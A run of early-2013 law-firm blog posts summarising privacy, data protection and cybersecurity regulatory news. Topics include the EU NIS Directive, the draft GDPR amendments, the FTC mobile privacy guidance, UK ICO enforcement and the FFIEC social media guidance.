The FSA review will cover 30 major financial institutions and include input from the Treasury, the Bank of England and other government departments and agencies to assess cybersecurity practises, and will culminate in an updated Business Continuity Management Practice Guide and discussion paper.

The aim of the review is to ensure a greater awareness of cyber risks and promote cybersecurity in the finance sector, and should help promote better security aimed at preventing cyber threats. The review will also seek to include information on correction techniques by detailing effective business continuity models for organisations.

This new scheme underscores the attention cybersecurity is getting within Europe, and the Guide is likely to complement or even inform the security measures anticipated by the European Commission’s draft Directive on Network and Information Security (“NIS”) (see our blog on the NIS Directive) that would require banks, stock exchanges and organisations from a range of other sectors to adhere to a set of common, minimum information security standards and impose an obligation to notify national regulators of cases where they experience significant cyber breaches.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O’Donoghue and Katalina Chin.

In December 2012, the Spanish Data Protection Authority (SPDA) published a new set of Model Clauses prepared purely for use by service providers that subcontract to companies located in countries outside the EEA.

These new Model Clauses (based on the 2010 controller-to-processor clauses) will allow for an international transfer of personal data between a data processor (data exporter) established in Spain to a subprocessor (data importer) based in a country that does not ensure an adequate level of protection in the field of personal data, within the context of an outsourcing arrangement.

The current sets of EU Model Clauses available are drafted from a data controller’s perspective in that the data controller is principally responsible for compliance requirements, such as in Spain, obtaining prior authorisation for transfers from the SPDA. Historically, that meant that the company that outsourced the services to the prime contractor was still responsible for getting SPDA authorisation for the international data transfer for each subcontractor.

Now, Spanish service providers acting as data processors can enter into Model Clauses directly with their subprocessors and initiate the prior authorisation process themselves with the SPDA to request approval of an international transfer of their client’s personal data for processing by their subcontractors located outside the EEA.

These new Model Clauses should facilitate data processing within a supply chain by allowing outsource service providers to engage subcontractors outside the EEA, serve as evidence to customers of their data protection compliance and ultimately market their services in a more competitive fashion. The Spanish DPA has clearly responded to the demands of the outsourcing sector by providing a more flexible method of covering processor-to-subprocessor data exports and helping to eliminate some of the regulatory barriers that place EU processors at a competitive disadvantage with their non-EEA competitors.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Dr. Thomas Fischl and Katharina Weimer.

One more chapter to the never ending story of the protagonist Facebook and ULD, the data protection authority of Schleswig-Holstein, has been written. Last week, a German administrative court decided that contrary to ULD’s official order, Facebook cannot be forced to permit the use of pseudonyms for its users.

While the ULD was sure that Facebook’s real name policy violated the German Telemedia Act (which expressly rules that users must be allowed to use nicknames online), the court did not necessarily disagree, but took a different view in reaching its decision. ULD’s orders were issued against Facebook Inc., in the U.S., and Facebook Ireland Limited, which is responsible for all of Facebook's activities outside of the U.S. and Canada. According to Facebook’s submission to the court, the existing German Facebook subsidiary (Facebook Germany GmbH) merely handles marketing and acquisition for the local market only and does not process any personal information. The court found that since Facebook Ireland Limited processes all user information, based on § 1 (5) sentence 1 of the German Federal Data Protection Act, as construed in accordance with Art. 4 (1) a) of the Directive 95/46/EC, Irish data protection laws apply, and not German laws.

This is a strong blow to the ULD. Thilo Weichert, Privacy Commissioner and head of the ULD, commented that “the decisions are more than amazing," especially because in his view, Facebook Ireland does not process any personal data itself either – this is done by Facebook Inc.

He announced that the ULD would appeal the decision to avoid the development of a one-stop-shop system. By establishing a main office in an EU member state with a low level of data protection, oversight in other countries could be avoided easily if the national entities remain ignorant of any data processing taking place.

We will keep you posted about any further developments. 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Paul Bond and Frederick Lah.

On February 1, the FTC released its Mobile Privacy Disclosures Guidance (the Guidance) setting forth best practice recommendations for platforms, app developers, third parties such as ad networks and analytics companies, and app trade associations. We previously wrote about the Guidance when it was issued.

On February 15, Assistant Director in the FTC’s Division of Privacy and Identity Protection, Chris Olsen, spoke at the latest National Telecommunications and Information Administration (NTIA) stakeholders’ meeting in Washington, DC about the Guidance. Here are some highlights from the meeting:

• Olsen started off the meeting by recapping the recent efforts by the FTC in the mobile space.
• He said that the FTC believes that consumers are not really aware of the types of information collection and sharing practices that are taking place.
• He described the mobile ecosystem as “complex” and that all the players in the ecosystem need to work together for its improvement.
• Olsen spoke about the specific roles and responsibilities of all the players in the ecosystem - app platforms, app developers, and app networks – as outlined in the Report (many of which we described in our previous blog article).
• According to Olsen, the Guidance was designed to do three things – (1) spur on members of the ecosystem to take a more active role in addressing the lack of sufficient disclosures; (2) reach as many industry participants as possible in the “diverse marketplace” and to educate participants on what are the best practices; (3) provide input to industry stakeholders, such as the NTIA, on the development of a code of conduct for the mobile space.
• One commentator noted that the Guidance sets out what industry participants should be doing, but does not seem to set out what the role of the FTC should be. Olsen responded by saying that, “the FTC needs to do better, too.” He specifically identified enforcement and outreach as areas for improvement.
• With respect to the Guidance’s recommendations for platforms, Olsen stressed the need for platforms to be clear to consumers about what they’re doing (or not doing) and to oversee and enforce their developer agreements. 
• Olsen pointed out that the Guidance does not set forth legal requirements and that the FTC did not issue the Guidance with the goal of providing any sort of legal framework. He did note though that Congress is interested in the issue and that they will continue to hold hearings about the state of affairs in the mobile environment, and that the FTC would provide input to Congress if called upon to do so.
• As for the use of icons in the mobile space, Olsen said that he thinks that an essential element of any icon program must be that it “communicates a clear message” and is not ambiguous. 
• He also noted that the recent report from the California AG’s office on mobile privacy is largely consistent with the FTC’s Guidance, but noted that the California report appears to cover a larger scope of mobile privacy issues, one not just focused on the issue of disclosures.

Olsen’s comments and the Guidance itself are informative, but it remains to be seen how the players in the ecosystem will respond to the recommended best practices. Another question will be what effect, if any, the Guidance will have on the FTC’s enforcement efforts? We’ll be monitoring this situation closely.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Timothy J. Nagle and Mark S. Melodia.

On February 12, the executive order “Improving Critical Infrastructure Cybersecurity” was issued, accompanied by a Presidential Policy Directive as well as a mention from President Obama in the State of the Union address. Similar to the previously discussed November 2012 draft, the executive order addresses: improvements in information sharing between the public and private sectors; application by implementing agencies of the Fair Information Practice Principles; development by the National Institute of Standards and Technology of a “Cybersecurity Framework” of standards, methodologies and processes that are consistent with voluntary international standards; an invitation to the private sector to participate in a voluntary critical infrastructure Cybersecurity Program; and identification of critical infrastructure at greatest risk.

The need for addressing the cyber threat is directly reflected in the executive order as well as with the recently introduced Cyber Intelligence Sharing and Protection Act (CISPA). Information sharing is the main focus of CISPA and addresses liability and other protections on use or dissemination for information shared by the private sector and eases some of the restrictions on sharing sensitive or classified government information. 

Please click here to read the issued Client Alert.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Keri S. Bruce.

The deadline to provide comments to aid the Federal Trade Commission (FTC) in its review of the Fred Meyer Guides (Guides) was reopened and extended until March 4, 2013. The Guides clarify the Robinson-Patman Act (Act) by explaining how manufacturers and wholesalers can provide advertising allowances and other promotional payments and services to retailers in a manner that does not violate the prohibited anti-competitive price discrimination requirements of the Act.

Please click here for more information on our sister blog, Adlaw by Request.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue, Timothy J. Nagle and Christine E. Nielsen.

On 7 February, the European Commission published an EU Cyber Security Strategy encompassing a proposed Directive on Network and Information Security. The aim of the Strategy and Directive is to ensure a secure and trustworthy digital environment while promoting and protecting fundamental rights, including data protection, democracy and the rule of law. The proposed NIS Directive contains many of the same elements found in the critical infrastructure/cybersecurity program currently existing in the United States; however, extending the security obligations as proposed greatly exceeds the reach of U.S. critical infrastructure programs, and essentially leaves no private business outside the reach of the Directive. The Directive asserts, without providing any real evidence for the assertion, that all of these new requirements will impose no additional costs, given the requirement under national data protection legislation to maintain appropriate security measures to protect personal data. The NIS Directive contains many laudable provisions, including the principal purpose that Member States should create strategies and competent authorities to supervise cyber risk to critical infrastructure and implement consistent cybersecurity efforts across the EU. This would aid in the creation of emergency response efforts, the sharing of information and the harmonization of law enforcement investigations. However, the breadth and scale of the effort contemplated by the NIS directive may impede progress. The addition of prescriptive requirements on “market operators” will almost certainly lead to the same contentious debate that has pervaded the effort to pass national cybersecurity legislation in the United States. In addition, the insertion of a sanction regime will only add to the difficulties in getting the Directive passed by the European Parliament. Given that security is scalable and risk dependent, sanctions should only arise not for a breach, but when the risk has either been negligently assessed or there is a reckless disregard.

Please click here to read the issued Client Alert.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Paul Bond and Frederick Lah.

A California state assemblyman proposed legislation this week attempting to require that online privacy policies be no more than 100 words. The legislation would also require that the privacy policy “be written in clear and concise language, be written at no greater than an 8th grade reading level, and to include a statement indicating whether the personally identifiable information may be sold or shared with others, and if so, how and with whom the information may be shared.” This legislation, if passed, would serve to amend California’s Online Privacy Protection Act, which applies to every operator of a website or online service directed to consumers in California.

Common sense and good business practice dictate that privacy policies be as comprehensible and as concise as possible. Most companies, however, will almost certainly find this 100-word limitation to be simply unworkable, especially given the requirement that there be statements about how personally identifiable information is sold, and to whom is it sold and with whom it is shared. That disclosure alone, even if written as clearly and concisely as possible, could easily exceed 100 words. At the very least, every privacy policy should also include details about what type of information is collected, how it is collected, and how it is used, as well as any additional content requirements from applicable federal laws like COPPA and GLBA.

In a day and age when the FTC and even the California AG have gone after companies for insufficient disclosures, a 100-word limitation would seem to conflict with this increasing demand from regulators for companies to have more complete disclosures. Forcing these companies to comply with a strict word count, rather than emphasizing “plain language” solutions, would seem to miss the point. It’s also important to understand that the average length of an online privacy policy is 2,500 words, according to a 2008 study.  Even this short blog article (which contains more than 350 words), would be way too long as a privacy policy under the proposed legislation. Obviously, unnecessarily verbose privacy policies are not the answer, but we think the same can be said for word limitations.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Paul Bond, Lisa B. Kim, and Frederick Lah.

In the midst of all the recent attention on mobile apps and their privacy challenges, BlackBerry has unveiled a new “privacy notice” service that alerts customers about apps that “don’t clearly or adequately inform users about how the app is accessing and possibly managing customers’ data.” According to BlackBerry, these notices will “provide information about an application's behavior in order for customers to make an informed decision about whether to continue using the app.” In addition, the notices will provide information to users on how to remove the app.

As an example, BlackBerry issued its first “privacy notice” to NumberBook, a caller ID app. After conducting an investigation into the app, BlackBerry determined that in addition to identifying callers, NumberBook, unbeknownst to the user, was collecting the user’s contact list and GPS location, and had the ability to send text messages from the user’s device. This did not comply with BlackBerry’s privacy and mobile app guidelines because it did not provide sufficient notification to users about what information was uploaded from their device or how it was used or shared with third parties, nor did it seek consent from the user’s contacts before it disclosed their phone numbers to other NumberBook users. So BlackBerry removed the app from its App World store and issued an alert to BlackBerry owners who had previously downloaded the app.

BlackBerry’s new “privacy notice” service offers a technical solution designed to meet the increasing demand from regulators that apps provide better disclosures to consumers about the app’s privacy practices. Other companies, such as Facebook, have opted to respond to this increasing demand from regulators by agreeing to participate in the “Ad Choices” self-regulatory program, which applies to both mobile web and mobile app advertisements. Interestingly, BlackBerry's service was unveiled the same day that the FTC released its latest report on mobile privacy disclosures, which we previously covered here.  As regulatory pressure continues to build from both the FTC and the states, namely California, it will be interesting to see how other app developers and platform providers in the mobile space will respond.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Mark S. Melodia and Frederick Lah.

On Thursday, February 7, 2013 (1 p.m. EST), Reed Smith attorney Mark Melodia will serve as a guest speaker for a webcast on "Big Data Converging with Legal, Information Governance and Regulatory Requirements.” The webcast will be hosted by Exterro, Inc., an e-discovery software solutions provider.

Leading companies in nearly all industries are gathering unprecedented types and quantities of data in order to better understand their customers and monetize the results, but the existence of these complex data sets has potential costs and challenges as well: how can this information be kept secure, what happens in the case of a breach, and how do ESI preservation and retrieval obligations change in a Big Data context? Mark will be addressing some of these important questions, alongside other professionals in the Big Data and e-discovery fields from Ernst and Young and TERIS.  

To register for this webcast, please click here.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by John P. Feldman, Paul Bond and Christine E. Nielsen.

Today, the Federal Trade Commission released detailed guidance on privacy in the mobile environment – at the same time it announced its largest-ever settlement with an app developer for alleged privacy violations. Combined with aggressive action on mobile privacy issues by the California attorney general’s office, Mobile Privacy Disclosures provides every company associated with a mobile app with an urgent reason to review all disclosures and practices. 

Please click here to continue reading this Client Alert. 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

On 21 November, in Rugby Football Union v Viagogo Ltd [2012] UKSC 55, the UK Supreme Court upheld the Court of Appeals' order for the disclosure of the identities of individuals who had used an online ticketing website to sell and purchase international rugby tickets at inflated prices in breach of the Rugby Football Union’s (RFU) ticket terms and conditions.

The appellant, an online ticket-selling company called Viagogo, argued that complying with a Norwich Pharmacal Order (which requires the disclosure of documents relating to third parties) would involve a breach of Article 8 of the Charter of Fundamental Rights of the European Union, which grants the right to the protection of personal data. The lower courts had issued the order requiring Viagogo to disclose the documents to the RFU as the RFU had an arguable case of breach of contract and trespass, and had no alternative means to discover the identities of the individuals who used Viagogo to sell six-nations rugby match tickets.

In claiming that disclosure of the ticket sellers’ names and addresses would breach their data protection rights, Viagogo asked the Supreme Court to evaluate the impact on each of the individuals on a case-by-case basis against the value to the RFU of receiving their personal data, rather than any wider possible value, such as deterring others from selling or buying rugby tickets via similar websites.

The Supreme Court rejected Viagogo’s argument that the examination should be conducted narrowly, ruling that courts must also take into account the broader context. The court emphasised that an individual’s personal data can be disclosed where it is necessary and proportionate, and where an “intense focus” on the rights of individuals does not lead to the conclusion that the individuals whose data will be disclosed will have been “unfairly or oppressively treated” in all the circumstances after a careful weighing of all relevant factors. In upholding the disclosure order, the Supreme Court took into account the RFU's desire to prevent the future sale of tickets for international matches at inflated prices, and the fact that the order might deter individuals from breaching the RFU ticket terms.

The Supreme Court also stated that any disclosure of individuals' personal data under a Norwich Pharmacal order will always require consideration of how the individual will be affected and that “in some limited instances,” individuals’ data protection rights “may displace the interests” of the party seeking disclosure even where that party has no immediately feasible alternative means of obtaining the information.

The case demonstrates that disclosure of individuals’ personal data may be overridden when there are competing rights, and when given the wider content, the disclosure is proportionate.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

The UK Information Commissioner's Office (ICO) has published a report detailing compliance and consumer concerns about use of cookies, following the changes under Privacy and Electronic Communications (EC Directive) (Amendment) Regulations 2011 (PECR), which require consent, more transparent notice and opt-out.

In response to more than 550 consumer complaints about implied consent mechanisms and the lack of information provided by website operators, the ICO began surveying website operators on cookie compliance in May 2012. The ICO contacted more than 100 website operators, informing them about the reported consumer concerns and asking them to ensure they are compliant. The ICO’s survey showed that more than half of these website operators had either taken limited compliance steps or no steps at all.

The ICO surveyed UK websites it considered to be among the 200 most visited and found that while many had taken steps to comply, most were not considered to be fully compliant, and of the 200, only one site had failed to take any steps at all. The ICO issued that website operator with a deadline for compliance.

The report illustrates that the majority of websites taking significant steps to make users aware that cookies are in use and obtain necessary consent, are using banners and relying on implied consent. The ICO’s guidance requires informed consent, which requires website operators to provide users with clear and relevant information. The information should be clear enough for users to understand when cookies are necessary because of a user’s request for content or services, and, alternatively, when cookies are optional and a user may opt out.

The ICO was encouraged that “few popular sites appear to fall into the category of not seeking consent to use cookies,” but warned that they are contacting more non-compliant website operators, will continue to monitor compliance, and will use their regulatory powers, including monetary penalties, against companies failing to comply with PECR.
 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

The UK Committee of Advertising Practise (CAP), which writes and maintains the UK Advertising Codes, has introduced new rules for organisations conducting online behavioural advertising (OBA), to provide greater transparency and choice to consumers. The new rules will be incorporated into the UK Code of Non-broadcast Advertising, Sales Promotion and Direct Marketing, which will come into force 4 February 2013, and will apply to third-party providers of OBA services and not the website owners.

CAP believes that by properly informing consumers about OBA and providing them with greater choice, they will be more inclined to receive tailored advertisements. The rules require organisations conducting OBA to provide a clear and comprehensive notice about what web viewing behaviour data they are collecting, either within or around the subsequently displayed tailored advertisement. The notice must also provide users an opportunity to opt-out of the OBA-related data collection. The rules will be enforced by the UK Advertising Standards Agency.

Organisations that use technology to collect and use information about all or substantially all websites that are visited by web users on a particular computer in order to deliver OBA must obtain the user’s explicit consent before collecting the data. CAP has also stipulated that OBA must not be used to target children under the age of 12.

The new rules are part of an initiative to establish a European industry-wide self-regulatory standard supported by an EU Industry Framework on OBA. Organisations that sign up to the Framework would be permitted to use an interactive icon that can be placed on advertisements. The icon is sponsored by the European Interactive Digital Advertising Alliance (EDAA), which was founded by a European advertising industry coalition. The icon provides information about how and why the advertisement was targeted and delivered to the web user, and provides them with an opt-out mechanism.

The new OBA rules are separate from, although may assist in part with compliance with, the e-Privacy Directive requirement of obtaining consent before placing cookies on a user’s device, which is enforced by the UK Information Commissioner’s Office.
 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O’Donoghue.

In a speech at the EC Justice Council meeting in Dublin 18 January 2013, Vivian Reding, European Commissioner for Justice, Fundamental Rights and Citizenship, demonstrated her commitment to continuing the “good progress” made on the EU Proposed Data Protection Framework (Proposed Framework). Her comments focused on three topics being debated at the meeting: the household exemption, the right to be forgotten, and tougher fines.

Reding first emphasised that the household exemption, which permits individuals processing data as part of a purely personal activity, was a necessary part of the proposed General Data Protection Regulation, but that to modernise for the digital age, it should only apply where there is no gainful interest to the individual. This approach would change current business operations where individuals are incentivised to provide their contact lists to social networks or other e-commerce sites.

Reding stressed that the right to be forgotten is an important method of providing individuals with control over their personal data. Responding to criticism that it would be difficult, if not impossible, to remove all personal data from the Internet, Reding suggested a pragmatic approach whereby companies are not obliged to remove all traces of data, but must at least inform third parties processing the data of any erasure request made by an individual.

Reding also advocated that fines needed to be tougher to be more of a deterrent; fines in the Proposed Framework can be up to 2% of worldwide annual turnover. Several voices, including the Irish, who hold the current EU Presidency, have instead questioned the appropriateness of the penalties in the Proposed Framework, and are arguing that data protection authorities should be given discretion and flexibility in how penalties are issued.

In addition, Reding expressed strong support of the Albrecht report, reiterating that a modern and uniform set of data protection rules is good for growth within the EU and could save up to €2.3 billion per year, a figure which was recently criticized by the UK Government for being over-inflated.
 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

EU Commission Vice-President Neelie Kroes, responsible for the Digital Agenda for Europe, and U.S. Secretary of Homeland Security Janet Napolitano, have signed a joint Declaration to “work collectively and in partnership to reduce the risks and maximise the benefits of the Internet for children.” The declaration demonstrates a mutual recognition by the United States and the EU of the need to establish appropriate safeguards to strengthen cyber security, and will complement the EU "Strategy for a Better Internet for Children."

The declaration sets out plans to create joint U.S./EU campaigns, with the U.S. Department of Homeland Security scheduled to participate in the EU Safer Internet Day 5 February 2013. The joint campaigns will seek to improve cybersecurity and focus on international cooperation between industry, public authorities, schools, and civil society to ensure a global audience.

According to the European Commission, 75% of children between the ages of 6 and 17 routinely use the Internet, and the declaration sets out three main objectives to protect children online:

1. Increase awareness of risks and improve skills of children, and engage parents and teachers to help enable best use of the Internet by collaborating on cybersecurity awareness
2. Work with industry, law enforcement and other stakeholders to ensure that Internet content and services can be trusted, and parents and children can make informed choices
3. Cooperate in fighting online child sexual exploitation and abuse

The EU and U.S. have historically worked together to combat cybercrime and have established an EU-U.S. Working Group on Cybersecurity and Cybercrime, and it is this existing collaboration that has led to this “key milestone.”

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

The European Commission has proposed a “digital to-do list” which sets out seven new priorities for the digital economy and society. Included in the proposal is a strategy and proposed Directive to prevent and counter cybercrime. Proposed by Neelie Kroes, the European Union’s Commissioner for the digital agenda, the draft Directive is expected to impose data breach notification and disclosure requirements on any company that runs large databases, including Internet search providers, social networks, e-commerce sites or cloud services. The Directive would harmonise national laws across Europe, where there is currently no overarching data breach law. Currently, only a few Member States have implemented data breach notification requirements, each with different approaches as to who should be notified, and the threshold requirements to trigger such notifications.

This new digital Directive, however, has, at best, the potential to overlap with or, at worst, conflict with the draft EU General Data Protection Regulation, which requires organisations to report data breaches within 24 hours to the "lead" data protection authority where it has its main European operations, as well as to each individual whose data has been compromised. Right now the only EU-wide data breach notification requirement stems from the ePrivacy Directive, and applies only to ISPs and telecoms providers.

The proposed new data breach obligation has the potential to cover a wide array of industries, possibly leading to notification fatigue. Liam Benham, a vice president in charge of governmental programs at IBM Europe, suggested that the reporting requirements should be limited to operators of critical infrastructure, like power grids, financial networks and transport systems.

There is clearly a need for ensuring that companies are not overburdened by notification requirements, and that any notification obligation does not either overlap or conflict with other obligations, or thwart the overall objective of reducing cybercrime.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Timothy J. Nagle, John P. Feldman, and Frederick Lah.

Earlier this week, the Federal Financial Institutions Examination Council (“FFIEC”) released its proposed guidance requesting comment on the applicability of consumer protection laws to the social media activities of financial institutions. The guidance addresses the potential risks associated with the use of social media by financial institutions.

Financial institutions use social media in a variety of ways, including marketing products, interacting with customers, facilitating applications for accounts, inviting feedback, and providing customer incentives. Social media is defined by the FFIEC as a “form of interactive online communication in which users can generate and share content through text, images, audio, and/or video.” This includes micro-blogging sites, forums, blogs, customer review websites and bulletin boards, photo and video sites, sites that enable professional networking, virtual worlds, and social games.

In the report, the FFIEC describes the compliance, reputational and operational risks to financial institutions when participating in social media activities. Since the various laws applicable to financial institutions do not contain exceptions for social media, the FFIEC expects financial institutions to comply with the laws applicable to all products or services they make available or administer via social media, including deposit and lending products (e.g., Truth in Savings Act, Fair Lending Laws, Fair Housing Act, Truth in Lending Act), payments (e.g., Electronic Fund Transfer Act), and collection of customer information (e.g., Gramm-Leach-Bliley Act, CAN-SPAM, Telephone Consumer Protection Act, COPPA, Fair Credit Reporting Act). The reputation risk can be significant and can include the adverse impact of dissatisfied customer comments on proprietary pages or unrelated “gripe sites,” and the attendant negative publicity. The proposed guidance also notes that activities related to the use of customer information via social media may draw negative reactions from customers from a privacy standpoint. Also, employees may post communications on their own social media accounts about the financial institution, which may reflect poorly on the financial institution. Of particular note, the report recommends that financial institutions use social media monitoring tools and techniques to identify and respond to comments or complaints, fraudulent use of the institution’s brand (e.g. phishing), or “any active discussion of the institution on the Internet.” As with all banking activities, operational risk, which involves the risk of loss resulting from inadequate or failed processes, people, or systems, must also be considered. All employees, especially those who represent the financial institution in customer service, account support or marketing roles, must be well trained on the appropriate use of social media when interacting with the public and customers.

To address these risks, the FFIEC says that financial institutions should have a social media risk management program in place that encompasses:

• A governance structure with clear roles and responsibilities, which should include senior management directing how the use of social media contributes to the financial institution’s strategic goals
• Policies and procedures regarding the use and monitoring of social media, and compliance with all applicable consumer protection laws
• A due diligence process for selecting and managing third-party service providers who offer social media services
• An employee training program focused on social media use
• An oversight process for monitoring information posted to social media sites

Under the guidance, even institutions that have chosen not to use social media need to be prepared to respond to negative social media publicity, while also providing guidance to employees on business-related social media activities.

The FFIEC is inviting comments on all aspects of the proposed guidance. Specifically, the FFIEC is soliciting comments in response to the following questions:

• Are there other types of social media, or ways in which financial institutions are using social media, that are not included in the proposed guidance but that should be included?
• Are there other consumer protection laws, regulations, policies or concerns that may be implicated by financial institutions’ use of social media that are not discussed in the proposed guidance, but that should be discussed?
• Are there any technological or other impediments to financial institutions’ compliance with applicable laws, regulations, and policies when using social media of which the FFIEC should be aware?

Financial institutions should review their current and expected future social media presence in light of this proposed guidance. They should also evaluate their internal social media, marketing, privacy, Internet and customer-service policies for consistency with the FFIEC release, and to guide any comments they intend to submit to the FFIEC. Industry participants have 60 days from the date that the notice is published in the Federal Register to submit comments. Please contact the authors for assistance in submitting a comment.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

On January 10, 2013, Jan Philipp Albrecht, the rapporteur to the EU Parliament’s Committee on Civil Liberties, Justice and Home Affairs (“LIBE”), presented his draft report (the “Report”) proposing amendments to the European Commission’s proposed Data Protection Regulation (the “Proposed Regulation”).

Albrecht’s amendments to what was already a complex and prescriptive piece of draft legislation have received mixed reviews from government and industry. The UK recently voiced its criticism of the current proposals, while the European Data Protection Supervisor (EDPS) reacted positively to Albrecht’s report, indicating that it was impressed with the changes made, as they included many of the EDPS and Article 29 Working Party recommendations.

Albrecht has recommended significant alterations to the most contentious provisions, such as the definition of personal data, consent, the rights of access, portability and to be forgotten, and the 24-hour breach notification. Albrecht has sought to simplify the legal framework while also strengthening individuals’ rights.

The definition of personal data includes data that would single a person out, either from data held alone or when used in “combination with associated data,” and seeks to clarify uses of pseudonymised data and create a definition for anonymous data that prevents identification of a person, where identification, directly or indirectly, would require a “disproportionate amount of time, expense and effort.”

Albrecht believes consent “is the best way for individuals to gain more control over data processing activities,” and his proposed amendments consent to be explicit, freely given, specific-informed, and obtained through "clear affirmative action," since pre-ticked boxes cannot be seen to express free consent.

The right of access would now include the ability to obtain information about profiling and whether a governmental authority had requested data, as well as whether an organisation had complied with that request. The right of portability would be amended to be part of the right of access, so that copies of data are provided in a format that can be migrated to another service.

In relation to the right to be forgotten, Albrecht includes a provision for erasure if there is no legitimate grounds to retain the data. This aims to ensure that companies that have transferred data to third parties without a legitimate legal basis, do actually erase the data. Vivian Reding, in a speech at the EC Justice Council meeting in Dublin 18 January 2013, endorsed this “ambitious and pragmatic” approach in being necessary to prevent imposing unreasonable obligations on businesses.

Responding to the perceived short time limit of 24 hours for notifying the National Supervisory Body of personal data breaches initially proposed by the European Commission, Albrecht suggests extending the time frame to 72 hours.

Albrecht also recommends more onerous notification requirements, with data controllers required to use a multi-layered approach including easily understandable, icon-based descriptions for different types of processing.

Albrecht also recommends that organisations’ ability to rely on legitimate interest basis for processing data be limited to “exceptional circumstances,” where it would be possible for data controller’s interests to override the fundamental rights and freedoms of data subjects.

Other amendments proposed by Albrecht include replacing the criterion for mandatory appointment of a data protection officer (DPO) from being based on having more than 250 employees, to processing the data of 500 individuals or more per year. This means that even small companies and start-ups would incur this expense.

In its recent response to the UK Justice Select Committee’s opinion on the Data Protection framework proposals, the UK Ministry of Justice found mandatory appointments of DPOs unnecessary and suggested that data controllers should be encouraged to appoint DPOs “if they were felt necessary to ensure compliance with the proposed Regulation.” Both the UK Ministry of Justice and the UK Justice Select Committee have been highly critical of proposed Regulation, finding it overly prescriptive and likely to increase costs to the UK economy of between £100 million – £360 million per annum; and the UK Government likely would view Albrecht’s amendments even more harshly, since the UK would like to see the draft Regulation re-casting as a Directive to allow Member States a degree of flexibility.

The Irish government, which currently holds the EU presidency, also expressed concern at a Justice Council meeting in Dublin, suggesting that the household exemption (which permits individuals processing data as part of purely personal activity) and the right to be forgotten are unrealistic. While the Irish have previously said that the proposed Regulation is a priority they would like to see passed during their EU term of presidency, the draft Regulation is continuing to prove highly contentious, and any effort to further constrain business is likely to meet with resistance from some Member States as well as industry.
 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

The "right to be forgotten" as contained in the EU Commission’s Proposed Data Protection Regulation (Proposed Regulation), enhances the existing right to data erasure obligation by including an obligation on data controllers that have personal data public, to inform third parties on the data subject's request to erase any links to, or copy or replicate personal data the individual no longer wishes to be public, from online services. How this new right may be implemented is far from straightforward, and the European Network and Information Security Agency (ENISA) has exposed many of the technical difficulties of its implementation in a report, “The right to be forgotten – between expectations and practice.”

A fundamental concern raised by ENISA is the broad scope of the definition of personal data. In addition, ENISA warns that the draft regulation is not specific enough with regard to who has the right to request the deletion of data. This can become complex in certain circumstances, especially in the context of multiple data subjects with divergent viewpoints on deletion. Although difficult to administer, according to ENISA, there is an obvious need to establish who gets to decide in these situations.

ENISA also finds the definition of "forgotten" data problematic, asking whether it is enough to simply make the data inaccessible to the public or whether it requires absolute deletion. Concerns are raised about the complexities involved in the deletion of personal data from data in large data sets or “Big Data,” especially where it may be possible to re-identify individuals from information from data held in large data sets. ENISA also points out that research, which depends on aggregated and derived forms of information (e.g., statistics), if elements of the raw data from which the data set is derived are forgotten.

Because of the Internet’s openly accessible nature, once information is published it becomes impossible to prevent unauthorised copying of the information, making it difficult, if not impossible, to locate all copies of it. Enforcement of the right to be forgotten solely through technical means or through requests to "take down" information, is therefore unlikely to be feasible. ENISA suggests that technical enforcement would need to be supplemented by international legal provisions aimed at making it difficult to find personal data, for instance, by requiring search engines to filter references to forgotten data from their search results.

Although ENISA stays clear of opining of the merit of a right to be forgotten, the report demonstrates that reliance on technical means to comply with the right, should it be implemented, requires a clearer definition of the scope of personal data, a clarification of who has the right to ask for the deletion, and under which circumstances and what methods data can be considered "forgotten." The ENISA report shows that a technical solution by itself is impossible, and what is required is a further refinement by policymakers and data protection authorities if the right to be forgotten is to operate effectively should it be implemented.
 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

In a clampdown on the UK’s growing illegal telemarketing, the Information Commissioner's Office (ICO) issued its first monetary penalties under the Privacy and Electronic Communications Regulations 2011 (PECR) in November.

Following an 18-month investigation, Christopher Niebel and Gary McNeish of Tetrus Telecoms were fined £300,000 and £140,000 respectively for distributing up to 840,000 illegal spam marketing texts per day over the past three years. By doing so, they violated the PECR rules requiring marketers to identify themselves, and by not offering an opt-out mechanism for recipients. When recipients responded, even by testing "stop," the pair allegedly sold the personal data to claims-management agencies.

The ICO recommends that the public does not respond and instead deletes the messages. If an individual replies positively to a message offering compensation for a road accident or mis-sold Payment Protection Insurance (PPI), their personal information will be passed to a claims-management company, which can then receive substantial commission by selling their case to a solicitor

Despite having issued these punitive fines, the ICO claims to continue to receive complaints, is considering issuing a further three penalties to companies engaged in illegal marketing activities, and is currently carrying out five separate investigations.

• Print
• Comments (1)
• Trackbacks
• Share Link

This post was written by Brad M. Rostolsky and Nancy E. Bonifant.

The long awaited final rule, released yesterday by the Office for Civil Rights (OCR) of the Department of Health and Human Services, modifies the HIPAA Privacy, Security, Breach and Enforcement Rules and is comprised of four final rules which implement the statutory requirements of the Health Information Technology for Economic and Clinical Health Act (HITECH) and the Genetic Information Nondiscrimination Act (GINA).

Please click here for a more detailed analysis on our sister blog, Health Industry Washington Watch.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Lisa B. Kim, Paul Bond, John P. Feldman, Christine E. Nielsen and Frederick Lah.

